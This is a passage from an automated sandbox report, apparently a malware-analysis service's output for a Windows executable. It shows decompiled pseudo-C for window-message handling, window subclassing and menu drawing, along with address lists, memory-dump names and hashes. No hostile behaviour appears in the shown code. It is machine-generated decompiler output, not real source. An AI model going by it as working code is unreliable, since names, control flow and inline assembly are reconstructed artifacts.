                                                                        						__eflags =  *((char*)(_t762 + 0x245));
                                                                        						if( *((char*)(_t762 + 0x245)) == 0) {
                                                                        							_t634 = _t339;
                                                                        							E0046F724(_v8, _t634 + 0x38);
                                                                        							__eflags =  *((intOrPtr*)(_t634 + 0xc)) - 2;
                                                                        							if(__eflags != 0) {
                                                                        								L83:
                                                                        								__eflags =  *((intOrPtr*)(_t634 + 0xc)) - 1;
                                                                        								if(__eflags == 0) {
                                                                        									_t566 = E004037D8(_v8, __eflags);
                                                                        									__eflags = _t566;
                                                                        									if(_t566 == 0) {
                                                                        										 *(_v12 + 0xc) = 1;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								_t569 = E004037D8(_v8, __eflags);
                                                                        								__eflags = _t569;
                                                                        								if(_t569 != 0) {
                                                                        									goto L83;
                                                                        								} else {
                                                                        									 *(_v12 + 0xc) = 1;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t819 = _t682 - 0xfffffe66;
                                                                        						if(_t819 > 0) {
                                                                        							_t767 = _t682 - 0xfffffe67;
                                                                        							__eflags = _t767;
                                                                        							if(_t767 == 0) {
                                                                        								_t795 = E0046F724(_v8, _t339 + 0x10);
                                                                        								__eflags = _t795;
                                                                        								if(_t795 != 0) {
                                                                        									 *((intOrPtr*)(_t795 + 0x10)) = 0;
                                                                        									E0042EA04( *((intOrPtr*)(_v8 + 0x330)), 0);
                                                                        									_t577 = _v8;
                                                                        									__eflags =  *((char*)(_t577 + 0x25c));
                                                                        									if( *((char*)(_t577 + 0x25c)) == 0) {
                                                                        										E0046E1D8(_t795);
                                                                        									} else {
                                                                        										E0046DEB8(_t795);
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								_t772 = _t767 - 2;
                                                                        								__eflags = _t772;
                                                                        								if(_t772 == 0) {
                                                                        									 *((char*)(_v8 + 0x218)) = 1;
                                                                        									 *((intOrPtr*)(_v8 + 0x220)) = E0046F724(_v8,  *((intOrPtr*)(_v12 + 8)) + 0x38);
                                                                        								} else {
                                                                        									__eflags = _t772 == 1;
                                                                        									if(_t772 == 1) {
                                                                        										_t586 = _v8;
                                                                        										__eflags =  *((char*)(_t586 + 0x245));
                                                                        										if( *((char*)(_t586 + 0x245)) == 0) {
                                                                        											_t638 =  *((intOrPtr*)(_v12 + 8));
                                                                        											E0046F724(_v8, _t638 + 0x38);
                                                                        											_t589 =  *((intOrPtr*)(_t638 + 0xc));
                                                                        											__eflags = _t589 - 2;
                                                                        											if(__eflags != 0) {
                                                                        												__eflags = _t589 - 1;
                                                                        												if(__eflags == 0) {
                                                                        													E004037D8(_v8, __eflags);
                                                                        												}
                                                                        											} else {
                                                                        												E004037D8(_v8, __eflags);
                                                                        											}
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						} else {
                                                                        							if(_t819 == 0) {
                                                                        								_t639 = _t339;
                                                                        								_t595 = E00436D1C(_v8);
                                                                        								__eflags = _t595;
                                                                        								if(_t595 != 0) {
                                                                        									L75:
                                                                        									 *(_v12 + 0xc) = 1;
                                                                        								} else {
                                                                        									E0046F724(_v8, _t639 + 0xc);
                                                                        									_t611 = E004037D8(_v8, __eflags);
                                                                        									__eflags = _t611;
                                                                        									if(_t611 == 0) {
                                                                        										goto L75;
                                                                        									}
                                                                        								}
                                                                        								_t597 = _v12;
                                                                        								__eflags =  *(_t597 + 0xc);
                                                                        								if( *(_t597 + 0xc) == 0) {
                                                                        									_t640 = E00427150(E0043CC2C(_v8));
                                                                        									 *(_v8 + 0x224) = _t640;
                                                                        									 *((intOrPtr*)(_v8 + 0x214)) = GetWindowLongA(_t640, 0xfffffffc);
                                                                        									SetWindowLongA( *(_v8 + 0x224), 0xfffffffc,  *(_v8 + 0x228));
                                                                        								}
                                                                        							} else {
                                                                        								_t783 = _t682 - 0xfffffe3d;
                                                                        								if(_t783 == 0) {
                                                                        									L93:
                                                                        									_t806 = _t339;
                                                                        									_t552 =  *((intOrPtr*)(_v8 + 0x330));
                                                                        									__eflags =  *(_t552 + 0x30);
                                                                        									if( *(_t552 + 0x30) <= 0) {
                                                                        										E0046F724(_v8, _t806 + 0x38);
                                                                        										E004037D8(_v8, __eflags);
                                                                        									} else {
                                                                        										_t633 = _t552;
                                                                        										E0042EA04(_t633, 0);
                                                                        										 *((intOrPtr*)(_t633 + 0xc)) = E0046F724(_v8, _t806 + 0x38);
                                                                        										E0042EA04(_t633, 1);
                                                                        									}
                                                                        								} else {
                                                                        									_t784 = _t783 - 1;
                                                                        									if(_t784 == 0) {
                                                                        										L91:
                                                                        										E0046F724(_v8,  *((intOrPtr*)(_v12 + 8)) + 0x38);
                                                                        										_t531 = E004037D8(_v8, __eflags);
                                                                        										__eflags = _t531;
                                                                        										if(_t531 == 0) {
                                                                        											 *(_v12 + 0xc) = 1;
                                                                        										}
                                                                        									} else {
                                                                        										if(_t784 == 0x27) {
                                                                        											E004037D8(_v8, __eflags);
                                                                        										}
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					L114:
                                                                        					_pop(_t686);
                                                                        					 *[fs:eax] = _t686;
                                                                        					_push(0x47017b);
                                                                        					return E00404348( &_v148);
                                                                        				}
                                                                        			}
                                                                        0x0046fb95
                                                                        0x0046fb98
                                                                        0x0046fb9c
                                                                        0x0046fb9e
                                                                        0x0046fba1
                                                                        0x0046fba1
                                                                        0x0046fba1
                                                                        0x0046fba1
                                                                        0x0046fba8
                                                                        0x0046fbac
                                                                        0x0046fbba
                                                                        0x0046fbbd
                                                                        0x0046fbc4
                                                                        0x0046fbcd
                                                                        0x0046fbd7
                                                                        0x0046fbdd
                                                                        0x0046fbe2
                                                                        0x0046fbe5
                                                                        0x0046fbe8
                                                                        0x0046fbed
                                                                        0x0046fbf0
                                                                        0x0046fbf6
                                                                        0x0046fbf6
                                                                        0x0046fc04
                                                                        0x0046fc1d
                                                                        0x0046fc3b
                                                                        0x0046fc40
                                                                        0x0046fc42
                                                                        0x0046fc4f
                                                                        0x0046fc60
                                                                        0x0046fc65
                                                                        0x0046fc78
                                                                        0x0046fc7e
                                                                        0x0046fc81
                                                                        0x0046fc81
                                                                        0x0046fc81
                                                                        0x0046fc81
                                                                        0x0046fc42
                                                                        0x0046fbae
                                                                        0x0046fbb1
                                                                        0x0046fbb1
                                                                        0x0046fc8e
                                                                        0x0046fc94
                                                                        0x0046fc96
                                                                        0x0046fc98
                                                                        0x0046fc9b
                                                                        0x0046fc9b
                                                                        0x0046fc9b
                                                                        0x0046fc9b
                                                                        0x0046fca1
                                                                        0x0046fca4
                                                                        0x0046fca7
                                                                        0x0046fcb5
                                                                        0x0046fcbc
                                                                        0x0046fa5e
                                                                        0x0046fa5e
                                                                        0x0046fa5e
                                                                        0x0046fa5f
                                                                        0x0046fccd
                                                                        0x0046fcd3
                                                                        0x0046fcd5
                                                                        0x0046fce8
                                                                        0x0046fce8
                                                                        0x0046fa65
                                                                        0x0046fa65
                                                                        0x0046fa65
                                                                        0x0046fa66
                                                                        0x0046fcf9
                                                                        0x0046fcff
                                                                        0x0046fd01
                                                                        0x0046fd14
                                                                        0x0046fd14
                                                                        0x0046fa6c
                                                                        0x0046fa6c
                                                                        0x0046fa6d
                                                                        0x0046fd25
                                                                        0x0046fd2b
                                                                        0x0046fd2d
                                                                        0x0046fd40
                                                                        0x0046fd40
                                                                        0x0046fd2d
                                                                        0x0046fa6d
                                                                        0x0046fa66
                                                                        0x00000000
                                                                        0x0046fa5f
                                                                        0x0046fa4a
                                                                        0x0046fa4a
                                                                        0x00000000
                                                                        0x0046fa4a
                                                                        0x0046f858
                                                                        0x0046f860
                                                                        0x0046f866
                                                                        0x0046f866
                                                                        0x0046f867
                                                                        0x0046f88c
                                                                        0x0046f892
                                                                        0x0046f894
                                                                        0x0046f93f
                                                                        0x0046f945
                                                                        0x0046f947
                                                                        0x0046f95c
                                                                        0x0046f95c
                                                                        0x0046f95f
                                                                        0x0046f95f
                                                                        0x0046f95f
                                                                        0x0046f949
                                                                        0x0046f952
                                                                        0x0046f958
                                                                        0x0046f95a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046f95a
                                                                        0x0046f96c
                                                                        0x0046f972
                                                                        0x0046f974
                                                                        0x0046f976
                                                                        0x0046f979
                                                                        0x0046f979
                                                                        0x0046f979
                                                                        0x0046f979
                                                                        0x0046f986
                                                                        0x0046f98c
                                                                        0x0046f98e
                                                                        0x0046f997
                                                                        0x0046f997
                                                                        0x00000000
                                                                        0x0046f89a
                                                                        0x0046f8a5
                                                                        0x0046f8b4
                                                                        0x0046f8c8
                                                                        0x0046f8df
                                                                        0x0046f8f4
                                                                        0x0046f8f9
                                                                        0x0046f8fc
                                                                        0x0046f8ff
                                                                        0x0046f90d
                                                                        0x0046f914
                                                                        0x0046f914
                                                                        0x0046f869
                                                                        0x0046f869
                                                                        0x0046f869
                                                                        0x0046f86a
                                                                        0x0046f9a9
                                                                        0x0046f9af
                                                                        0x0046f9b1
                                                                        0x0046f9c1
                                                                        0x0046f9c1
                                                                        0x0046f870
                                                                        0x0046f870
                                                                        0x0046f870
                                                                        0x0046f871
                                                                        0x0046f9d5
                                                                        0x0046f9db
                                                                        0x0046f9dd
                                                                        0x0046f9ed
                                                                        0x0046f9ed
                                                                        0x0046f877
                                                                        0x0046f877
                                                                        0x0046f878
                                                                        0x0046fa01
                                                                        0x0046fa07
                                                                        0x0046fa09
                                                                        0x0046fa19
                                                                        0x0046fa19
                                                                        0x0046fa09
                                                                        0x0046f878
                                                                        0x0046f871
                                                                        0x0046fd46
                                                                        0x0046fd46
                                                                        0x0046fd48
                                                                        0x0046fd4b
                                                                        0x0046fd4e
                                                                        0x0046fd61
                                                                        0x0046fd61
                                                                        0x0046f867
                                                                        0x0046f852
                                                                        0x0046f80d
                                                                        0x0046f80d
                                                                        0x0046f810
                                                                        0x004700ac
                                                                        0x004700b6
                                                                        0x004700bb
                                                                        0x004700be
                                                                        0x004700c5
                                                                        0x0047012f
                                                                        0x00470138
                                                                        0x0047014c
                                                                        0x004700c7
                                                                        0x004700d3
                                                                        0x004700e3
                                                                        0x004700f9
                                                                        0x00470102
                                                                        0x0047011a
                                                                        0x00470124
                                                                        0x00470124
                                                                        0x00470154
                                                                        0x00470154
                                                                        0x00000000
                                                                        0x0046f810
                                                                        0x0046f7e3
                                                                        0x0046f7e3
                                                                        0x00000000
                                                                        0x0046f7e9
                                                                        0x0046f7e9
                                                                        0x0046f7e9
                                                                        0x0046f7ef
                                                                        0x0046fff5
                                                                        0x00470002
                                                                        0x00470004
                                                                        0x00470006
                                                                        0x0047000c
                                                                        0x00470010
                                                                        0x0047001f
                                                                        0x0047002c
                                                                        0x0047002c
                                                                        0x00470010
                                                                        0x0046f7f5
                                                                        0x0046f7f5
                                                                        0x0046f7f5
                                                                        0x0046f7f6
                                                                        0x00470039
                                                                        0x00470046
                                                                        0x00470048
                                                                        0x0047004a
                                                                        0x00470050
                                                                        0x00470054
                                                                        0x00470059
                                                                        0x00470063
                                                                        0x00470067
                                                                        0x00470067
                                                                        0x0047006c
                                                                        0x00470070
                                                                        0x00470079
                                                                        0x00470082
                                                                        0x00470082
                                                                        0x00470085
                                                                        0x00470089
                                                                        0x00470096
                                                                        0x0047009f
                                                                        0x0047009f
                                                                        0x00470089
                                                                        0x0046f7fc
                                                                        0x0046f7fc
                                                                        0x0046f7fd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0046f803
                                                                        0x0046f7fd
                                                                        0x0046f7f6
                                                                        0x0046f7ef
                                                                        0x00000000
                                                                        0x0046f7e3
                                                                        0x0046f785
                                                                        0x0046f785
                                                                        0x0046fe37
                                                                        0x0046fe3a
                                                                        0x0046fe41
                                                                        0x0046fe4a
                                                                        0x0046fe52
                                                                        0x0046fe59
                                                                        0x0046fe5d
                                                                        0x0046fe80
                                                                        0x0046fe80
                                                                        0x0046fe84
                                                                        0x0046fe93
                                                                        0x0046fe98
                                                                        0x0046fe9a
                                                                        0x0046fea3
                                                                        0x0046fea3
                                                                        0x0046fe9a
                                                                        0x0046fe5f
                                                                        0x0046fe68
                                                                        0x0046fe6d
                                                                        0x0046fe6f
                                                                        0x00000000
                                                                        0x0046fe71
                                                                        0x0046fe74
                                                                        0x0046fe74
                                                                        0x0046fe6f
                                                                        0x0046fe5d
                                                                        0x0046f78b
                                                                        0x0046f78b
                                                                        0x0046f791
                                                                        0x0046f7ba
                                                                        0x0046f7ba
                                                                        0x0046f7c0
                                                                        0x0046ffa6
                                                                        0x0046ffa8
                                                                        0x0046ffaa
                                                                        0x0046ffb2
                                                                        0x0046ffc0
                                                                        0x0046ffc5
                                                                        0x0046ffc8
                                                                        0x0046ffcf
                                                                        0x0046ffe8
                                                                        0x0046ffd1
                                                                        0x0046ffd3
                                                                        0x0046ffd3
                                                                        0x0046ffcf
                                                                        0x0046f7c6
                                                                        0x0046f7c6
                                                                        0x0046f7c6
                                                                        0x0046f7c9
                                                                        0x0046fd6c
                                                                        0x0046fd87
                                                                        0x0046f7cf
                                                                        0x0046f7cf
                                                                        0x0046f7d0
                                                                        0x0046feaf
                                                                        0x0046feb2
                                                                        0x0046feb9
                                                                        0x0046fec2
                                                                        0x0046fecb
                                                                        0x0046fed2
                                                                        0x0046fed5
                                                                        0x0046fed8
                                                                        0x0046feed
                                                                        0x0046fef0
                                                                        0x0046feff
                                                                        0x0046feff
                                                                        0x0046feda
                                                                        0x0046fee3
                                                                        0x0046fee3
                                                                        0x0046fed8
                                                                        0x0046feb9
                                                                        0x0046f7d0
                                                                        0x0046f7c9
                                                                        0x0046f793
                                                                        0x0046f793
                                                                        0x0046fd95
                                                                        0x0046fd9a
                                                                        0x0046fd9f
                                                                        0x0046fda1
                                                                        0x0046fdc0
                                                                        0x0046fdc3
                                                                        0x0046fda3

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: LongWindow
                                                                        • String ID:
                                                                        • API String ID: 1378638983-3916222277
                                                                        • Opcode ID: d4a2872a6cfd99d343174a523ec3493d2adaa694f171adf8ea982967d72df4ec
                                                                        • Instruction ID: bc881593e282ff87a3e970e118c00ca0bda6ee8fb0a22e84ef7b770fe6afd480
                                                                        • Opcode Fuzzy Hash: d4a2872a6cfd99d343174a523ec3493d2adaa694f171adf8ea982967d72df4ec
                                                                        • Instruction Fuzzy Hash: 96623734A00204DFCB00DFA9D5C8A9EB7F1FF48314F6481A6E849AB366D738AE45DB55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 75%
                                                                        			E0043CF3C(void* __eax) {
                                                                        				void* _v28;
                                                                        				struct _WINDOWPLACEMENT _v56;
                                                                        				struct tagPOINT _v64;
                                                                        				intOrPtr _v68;
                                                                        				void* _t43;
                                                                        				struct HWND__* _t45;
                                                                        				struct tagPOINT* _t47;
                                                                        
                                                                        				_t47 =  &(_v64.y);
                                                                        				_t43 = __eax;
                                                                        				if(IsIconic( *(__eax + 0x180)) == 0) {
                                                                        					GetWindowRect( *(_t43 + 0x180), _t47);
                                                                        				} else {
                                                                        					_v56.length = 0x2c;
                                                                        					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        				}
                                                                        				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
                                                                        					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
                                                                        					if(_t45 != 0) {
                                                                        						ScreenToClient(_t45, _t47);
                                                                        						ScreenToClient(_t45,  &_v64);
                                                                        					}
                                                                        				}
                                                                        				 *(_t43 + 0x40) = _t47->x;
                                                                        				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
                                                                        				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
                                                                        				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
                                                                        				return E00435C00(_t43);
                                                                        			}











                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                        • String ID: ,
                                                                        • API String ID: 2266315723-3772416878
                                                                        • Opcode ID: 0e429eb8ffffe6df52a8329525d030c4f3db782929e8d24c94ca2f27c20065be
                                                                        • Instruction ID: 459ab4c7249235b108c54b4c36eddf7638014fb9c7bbac68c80982844e868d89
                                                                        • Opcode Fuzzy Hash: 0e429eb8ffffe6df52a8329525d030c4f3db782929e8d24c94ca2f27c20065be
                                                                        • Instruction Fuzzy Hash: 55117F71504201ABCB01EF6DD8C5A8B77D8AF0D314F04462AFD58EB386D739E9048BA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 91%
                                                                        			E0044A3C8(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr _v8;
                                                                        				struct HMENU__* _v12;
                                                                        				signed int _v16;
                                                                        				char _v17;
                                                                        				intOrPtr _v24;
                                                                        				int _v28;
                                                                        				struct HDC__* _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				intOrPtr* _v48;
                                                                        				char _v52;
                                                                        				intOrPtr _t137;
                                                                        				signed int _t138;
                                                                        				intOrPtr _t144;
                                                                        				signed int _t150;
                                                                        				signed int _t151;
                                                                        				intOrPtr* _t153;
                                                                        				void* _t158;
                                                                        				struct HMENU__* _t160;
                                                                        				intOrPtr* _t165;
                                                                        				void* _t173;
                                                                        				signed int _t177;
                                                                        				signed int _t181;
                                                                        				void* _t182;
                                                                        				void* _t214;
                                                                        				struct HDC__* _t221;
                                                                        				void* _t251;
                                                                        				signed int _t257;
                                                                        				void* _t265;
                                                                        				signed int _t271;
                                                                        				signed int _t272;
                                                                        				signed int _t274;
                                                                        				signed int _t275;
                                                                        				signed int _t277;
                                                                        				signed int _t278;
                                                                        				signed int _t280;
                                                                        				signed int _t281;
                                                                        				signed int _t283;
                                                                        				signed int _t284;
                                                                        				signed int _t286;
                                                                        				signed int _t287;
                                                                        				signed int _t290;
                                                                        				signed int _t291;
                                                                        				intOrPtr _t307;
                                                                        				intOrPtr _t311;
                                                                        				intOrPtr _t333;
                                                                        				intOrPtr _t342;
                                                                        				intOrPtr _t346;
                                                                        				intOrPtr* _t353;
                                                                        				signed int _t355;
                                                                        				intOrPtr* _t356;
                                                                        				signed int _t367;
                                                                        				signed int _t368;
                                                                        				signed int _t369;
                                                                        				signed int _t370;
                                                                        				signed int _t371;
                                                                        				signed int _t372;
                                                                        				signed int _t373;
                                                                        				intOrPtr* _t375;
                                                                        				void* _t377;
                                                                        				void* _t378;
                                                                        				intOrPtr _t379;
                                                                        				void* _t380;
                                                                        
                                                                        				_t377 = _t378;
                                                                        				_t379 = _t378 + 0xffffffd0;
                                                                        				_v52 = 0;
                                                                        				_t375 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t377);
                                                                        				_push(0x44a8fb);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t379;
                                                                        				_t137 =  *__edx;
                                                                        				_t380 = _t137 - 0x111;
                                                                        				if(_t380 > 0) {
                                                                        					_t138 = _t137 - 0x117;
                                                                        					__eflags = _t138;
                                                                        					if(_t138 == 0) {
                                                                        						_t271 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        						__eflags = _t271;
                                                                        						if(_t271 < 0) {
                                                                        							goto L67;
                                                                        						} else {
                                                                        							_t272 = _t271 + 1;
                                                                        							_t367 = 0;
                                                                        							__eflags = 0;
                                                                        							while(1) {
                                                                        								_t150 = E00449774(E00414208(_v8, _t367),  *(_t375 + 4), __eflags);
                                                                        								__eflags = _t150;
                                                                        								if(_t150 != 0) {
                                                                        									goto L68;
                                                                        								}
                                                                        								_t367 = _t367 + 1;
                                                                        								_t272 = _t272 - 1;
                                                                        								__eflags = _t272;
                                                                        								if(_t272 != 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									goto L67;
                                                                        								}
                                                                        								goto L68;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t151 = _t138 - 8;
                                                                        						__eflags = _t151;
                                                                        						if(_t151 == 0) {
                                                                        							_v17 = 0;
                                                                        							__eflags =  *(__edx + 6) & 0x00000010;
                                                                        							if(( *(__edx + 6) & 0x00000010) != 0) {
                                                                        								_v17 = 1;
                                                                        							}
                                                                        							_t274 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        							__eflags = _t274;
                                                                        							if(__eflags < 0) {
                                                                        								L32:
                                                                        								_t153 =  *0x495ad0; // 0x496c04
                                                                        								E00456E5C( *_t153, 0, __eflags);
                                                                        								goto L67;
                                                                        							} else {
                                                                        								_t275 = _t274 + 1;
                                                                        								_t368 = 0;
                                                                        								__eflags = 0;
                                                                        								while(1) {
                                                                        									__eflags = _v17 - 1;
                                                                        									if(_v17 != 1) {
                                                                        										_v12 =  *(_t375 + 4) & 0x0000ffff;
                                                                        									} else {
                                                                        										_t160 =  *(_t375 + 8);
                                                                        										__eflags = _t160;
                                                                        										if(_t160 == 0) {
                                                                        											_v12 = 0xffffffff;
                                                                        										} else {
                                                                        											_v12 = GetSubMenu(_t160,  *(_t375 + 4) & 0x0000ffff);
                                                                        										}
                                                                        									}
                                                                        									_t158 = E00414208(_v8, _t368);
                                                                        									_t295 = _v17;
                                                                        									_v16 = E004496B8(_t158, _v17, _v12);
                                                                        									__eflags = _v16;
                                                                        									if(__eflags != 0) {
                                                                        										break;
                                                                        									}
                                                                        									_t368 = _t368 + 1;
                                                                        									_t275 = _t275 - 1;
                                                                        									__eflags = _t275;
                                                                        									if(__eflags != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L32;
                                                                        									}
                                                                        									goto L68;
                                                                        								}
                                                                        								E00433724( *((intOrPtr*)(_v16 + 0x58)), _t295,  &_v52, __eflags);
                                                                        								_t165 =  *0x495ad0; // 0x496c04
                                                                        								E00456E5C( *_t165, _v52, __eflags);
                                                                        							}
                                                                        						} else {
                                                                        							__eflags = _t151 == 1;
                                                                        							if(_t151 == 1) {
                                                                        								_t277 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        								__eflags = _t277;
                                                                        								if(_t277 < 0) {
                                                                        									goto L67;
                                                                        								} else {
                                                                        									_t278 = _t277 + 1;
                                                                        									_t369 = 0;
                                                                        									__eflags = 0;
                                                                        									while(1) {
                                                                        										_v48 = E00414208(_v8, _t369);
                                                                        										_t173 =  *((intOrPtr*)( *_v48 + 0x34))();
                                                                        										__eflags = _t173 -  *(_t375 + 8);
                                                                        										if(_t173 ==  *(_t375 + 8)) {
                                                                        											break;
                                                                        										}
                                                                        										_t177 = E004496B8(_v48, 1,  *(_t375 + 8));
                                                                        										__eflags = _t177;
                                                                        										if(_t177 == 0) {
                                                                        											_t369 = _t369 + 1;
                                                                        											_t278 = _t278 - 1;
                                                                        											__eflags = _t278;
                                                                        											if(_t278 != 0) {
                                                                        												continue;
                                                                        											} else {
                                                                        												goto L67;
                                                                        											}
                                                                        										} else {
                                                                        											break;
                                                                        										}
                                                                        										goto L68;
                                                                        									}
                                                                        									E00449FB8(_v48, _t375);
                                                                        								}
                                                                        							} else {
                                                                        								goto L67;
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L68;
                                                                        				} else {
                                                                        					if(_t380 == 0) {
                                                                        						_t280 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        						__eflags = _t280;
                                                                        						if(_t280 < 0) {
                                                                        							goto L67;
                                                                        						} else {
                                                                        							_t281 = _t280 + 1;
                                                                        							_t370 = 0;
                                                                        							__eflags = 0;
                                                                        							while(1) {
                                                                        								E00414208(_v8, _t370);
                                                                        								_t181 = E00449758( *(_t375 + 4), __eflags);
                                                                        								__eflags = _t181;
                                                                        								if(_t181 != 0) {
                                                                        									goto L68;
                                                                        								}
                                                                        								_t370 = _t370 + 1;
                                                                        								_t281 = _t281 - 1;
                                                                        								__eflags = _t281;
                                                                        								if(_t281 != 0) {
                                                                        									continue;
                                                                        								} else {
                                                                        									goto L67;
                                                                        								}
                                                                        								goto L68;
                                                                        							}
                                                                        						}
                                                                        						goto L68;
                                                                        					} else {
                                                                        						_t182 = _t137 - 0x2b;
                                                                        						if(_t182 == 0) {
                                                                        							_v40 =  *((intOrPtr*)(__edx + 8));
                                                                        							_t283 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        							__eflags = _t283;
                                                                        							if(_t283 < 0) {
                                                                        								goto L67;
                                                                        							} else {
                                                                        								_t284 = _t283 + 1;
                                                                        								_t371 = 0;
                                                                        								__eflags = 0;
                                                                        								while(1) {
                                                                        									_v16 = E004496B8(E00414208(_v8, _t371), 0,  *((intOrPtr*)(_v40 + 8)));
                                                                        									__eflags = _v16;
                                                                        									if(_v16 != 0) {
                                                                        										break;
                                                                        									}
                                                                        									_t371 = _t371 + 1;
                                                                        									_t284 = _t284 - 1;
                                                                        									__eflags = _t284;
                                                                        									if(_t284 != 0) {
                                                                        										continue;
                                                                        									} else {
                                                                        										goto L67;
                                                                        									}
                                                                        									goto L69;
                                                                        								}
                                                                        								_v24 = E0041FDA0(0, 1);
                                                                        								_push(_t377);
                                                                        								_push(0x44a72e);
                                                                        								_push( *[fs:eax]);
                                                                        								 *[fs:eax] = _t379;
                                                                        								_v28 = SaveDC( *(_v40 + 0x18));
                                                                        								_push(_t377);
                                                                        								_push(0x44a711);
                                                                        								_push( *[fs:eax]);
                                                                        								 *[fs:eax] = _t379;
                                                                        								E004207B0(_v24,  *(_v40 + 0x18));
                                                                        								E0042062C(_v24);
                                                                        								E0044ABA0(_v16, _v40 + 0x1c, _v24,  *((intOrPtr*)(_v40 + 0x10)));
                                                                        								_pop(_t333);
                                                                        								 *[fs:eax] = _t333;
                                                                        								_push(0x44a718);
                                                                        								__eflags = 0;
                                                                        								E004207B0(_v24, 0);
                                                                        								return RestoreDC( *(_v40 + 0x18), _v28);
                                                                        							}
                                                                        						} else {
                                                                        							_t214 = _t182 - 1;
                                                                        							if(_t214 == 0) {
                                                                        								_v44 =  *((intOrPtr*)(__edx + 8));
                                                                        								_t286 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        								__eflags = _t286;
                                                                        								if(_t286 < 0) {
                                                                        									goto L67;
                                                                        								} else {
                                                                        									_t287 = _t286 + 1;
                                                                        									_t372 = 0;
                                                                        									__eflags = 0;
                                                                        									while(1) {
                                                                        										_v16 = E004496B8(E00414208(_v8, _t372), 0,  *((intOrPtr*)(_v44 + 8)));
                                                                        										__eflags = _v16;
                                                                        										if(_v16 != 0) {
                                                                        											break;
                                                                        										}
                                                                        										_t372 = _t372 + 1;
                                                                        										_t287 = _t287 - 1;
                                                                        										__eflags = _t287;
                                                                        										if(_t287 != 0) {
                                                                        											continue;
                                                                        										} else {
                                                                        											goto L67;
                                                                        										}
                                                                        										goto L69;
                                                                        									}
                                                                        									_t221 =  *((intOrPtr*)(_v8 + 0x10));
                                                                        									L00406FC4();
                                                                        									_v32 = _t221;
                                                                        									 *[fs:eax] = _t379;
                                                                        									_v24 = E0041FDA0(0, 1);
                                                                        									 *[fs:eax] = _t379;
                                                                        									_v28 = SaveDC(_v32);
                                                                        									 *[fs:eax] = _t379;
                                                                        									E004207B0(_v24, _v32);
                                                                        									E0042062C(_v24);
                                                                        									 *((intOrPtr*)( *_v16 + 0x38))(_v44 + 0x10,  *[fs:eax], 0x44a82f, _t377,  *[fs:eax], 0x44a84c, _t377,  *[fs:eax], 0x44a871, _t377, _t221);
                                                                        									_pop(_t342);
                                                                        									 *[fs:eax] = _t342;
                                                                        									_push(0x44a836);
                                                                        									__eflags = 0;
                                                                        									E004207B0(_v24, 0);
                                                                        									return RestoreDC(_v32, _v28);
                                                                        								}
                                                                        							} else {
                                                                        								if(_t214 == 0x27) {
                                                                        									_v36 =  *((intOrPtr*)(__edx + 8));
                                                                        									_t290 =  *((intOrPtr*)(_v8 + 8)) - 1;
                                                                        									__eflags = _t290;
                                                                        									if(_t290 < 0) {
                                                                        										goto L67;
                                                                        									} else {
                                                                        										_t291 = _t290 + 1;
                                                                        										_t373 = 0;
                                                                        										__eflags = 0;
                                                                        										while(1) {
